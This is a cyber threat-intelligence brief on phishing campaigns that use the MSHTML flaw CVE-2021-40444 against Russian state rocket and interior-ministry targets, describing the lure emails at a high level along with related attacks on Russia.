Russian Govt Hit

Malwarebytes Intelligence Team is reporting the MSHTML vulnerability classified as CVE-2021-40444 has become the focus of threat actors targeting Russian government entities. Its researchers intercepted phishing email attachments revealing that attackers were trying to target Russian organizations.

The CVE-2021-40444 vulnerability involves ActiveX and is an old flaw, but it was discovered recently, and soon enough, threat actors started sharing its PoCs, tutorials, and exploits on hacking forums to let interested individuals obtain step-by-step instructions about how to launch their own attacks.

Microsoft responded spontaneously by publishing mitigation guidelines, disabling new ActiveX controls installation, and releasing a patch in its latest Patch Tuesday report. However, the patching time is comparatively longer than the time it takes people to exploit the flaw.[1]

Email Template Explanation - The first template Malwarebytes analyzed is created so that it appears like an internal communication within the Joint Stock Company State Rocket Center named after Academician V.P. Makeyev. According to Malwarebytes, the phishing email states that the HR department is checking employees’ personal data and urges them to fill out a form in the email or reply to the mail. To fill out the form, the receiver has to enable editing, which triggers the exploit.

About the Affected Entities - GREC Makeyev is Russia’s strategic defense and industrial complex for the space and rocket industry. This facility is also the country’s main solid and liquid fuel strategic missile system developer.

Hence, it is Russia’s one of the leading R&D centers to develop rocket and space technology.

The Russian Ministry of Interior in Moscow is also the target of a similar campaign. Researchers noted that evidence of cybercrimes launched against Russian entities is a rarity. Considering that attackers are targeting the country’s space/rocket developer, it seems likely that a state-sponsored actor is perpetrating these attacks.

How does the Attack Works? - The attack, according to Malwarebytes’ blog post[2], mainly depends on MSHTML. It loads a specially designed ActiveX control when the receiver opens an infected MS Office document and runs the arbitrary code to infect the system with more malware.

In the malicious email, researchers claim another attachment originated from the Ministry of the Interior in Moscow. This attachment can be used for targeting other promising targets. The document’s title is in the Russian language that reads: “Notification of illegal activity.” The email urges the victim to return the filled-out form within 7 days.

Russia under cyber attacks - Usually, when it comes to cyberattacks, Russia or China are the usual suspects pointed out by the US and its allies. However lately, Russia has been tackling large-scale cyberattacks including the world’s largest DDoS attack on Yandex[3] earlier this month or 19 DDoS attacks on its electronic voting system in one day just a few days ago. In August, a new variant of the infamous Konni RAT was caught targeting Russiahttps://www.hackread.com/konni-rat-variant-hits-russia-ongoing-attack[4]. In the attack campaign, threat actors targeted economic and political issues between Russia and neighboring countries.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@wapacklabs.com

Weekly Cyber Intelligence Briefings: